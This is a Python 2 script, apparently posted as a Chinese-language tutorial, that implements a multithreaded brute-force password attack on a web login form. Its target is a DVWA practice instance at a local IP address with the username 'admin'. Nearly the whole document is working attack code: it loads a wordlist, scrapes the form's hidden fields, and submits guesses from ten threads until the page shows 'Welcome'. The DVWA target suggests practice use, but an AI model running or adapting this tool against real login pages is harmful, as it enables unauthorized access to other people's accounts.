python实现暴力破解

import urllib2
import urllib
import cookielib
import  threading
import sys
import Queue
from HTMLParser import HTMLParser

user_thread     =10
#这里登录名默认admin
username        ="admin"
#pass.txt中保存密码文本文件
wordlist_file   ="pass.txt"
resume          =None
#
target_url      ="http://192.168.31.113:8080/dvwa/login.php"
target_post     ="http://192.168.31.113:8080/dvwa/login.php"

#用户名区域
username_field="username"
#密码区域
password_field="password"

#检查是否成功登录
success_check="Welcome"


class BruteParser(HTMLParser):
    def __init__(self):
        HTMLParser.__init__(self)
        self.tag_results={}

    def handle_starttag(self,tag,attrs):
    #找到<input>
        if tag=="input":
            tag_name=None
            tag_value=None
# for example <input type="hidden" name="NXX" id="IDXX" value="VXX" />
# name=type,value=hidden     name=name,value=NXX      name=id,value=IDXX     name=value,value="VXX"
#attrs中各标签的名字和值
            for name_tag,name_tag_value in attrs:
                #找到名字等于name的标签
                if name_tag=="name":
                #获得名字等于name的标签的值
                    tag_name=name_tag_value
                    #找到名字等于value的标签 
                if name_tag=="value":
                #获得名字等于value的标签的值
                    tag_value=name_tag_value
                    # 将标签和标签的值放入tag_results{}
                if tag_name is not None:
                    self.tag_results[tag_name]=name_tag_value






class Bruter():
    def __init__(self):#注意__init__  左右两边都是两个_
    #打开密码文件读取内容
        fd=open(wordlist_file,"rb")
        raw_words=fd.readlines()
        fd.close()
        found_resume=False
        #队列
        words=Queue.Queue()
        for word in raw_words:
            word=word.rstrip()
            if resume is not None:
                if found_resume:
                    words.put(word)
                else:
                #如果中断，可以恢复
                    if word==resume:
                        found_resume=True
                        print("resuming from"+resume)
            else:
                words.put(word)
        self.username=username
        self.password_q=words#密码再保存到password_q
        self.found=False#是否找到正确密码
        print("finish setting for: %s" % username)


    def web_bruter(self):
    #密码队列没读取完且没找到正确密码
        while not self.password_q.empty() and not self.found:
            brute=self.password_q.get().rstrip()
            #存放cookie
            jar=cookielib.FileCookieJar("cookies")
            opener=urllib2.build_opener(urllib2.HTTPCookieProcessor(jar))
            #爬取目标网站内容
            response=opener.open(target_url)
            page=response.read()
            print("plan to brute")
#获得标签
            parser=BruteParser()
            parser.feed(page)
            post_tags=parser.tag_results
#传值给用户名区域
            post_tags[username_field]=self.username
            #传值给密码区域
            post_tags[password_field]=brute
#url编码post_tags
            login_data=urllib.urlencode(post_tags)
            login_response=opener.open(target_post,login_data)

            login_result=login_response.read()
#检查是否成功登录
            if success_check in login_result:
                self.found=True
                print("success")
                print(username+":"+brute)


# use more threads to start web_bruter
    def run_bruteforce(self):
        for i in range(user_thread):
            t=threading.Thread(target=self.web_bruter)
            t.start()


bruter_obj=Bruter()
bruter_obj.run_bruteforce()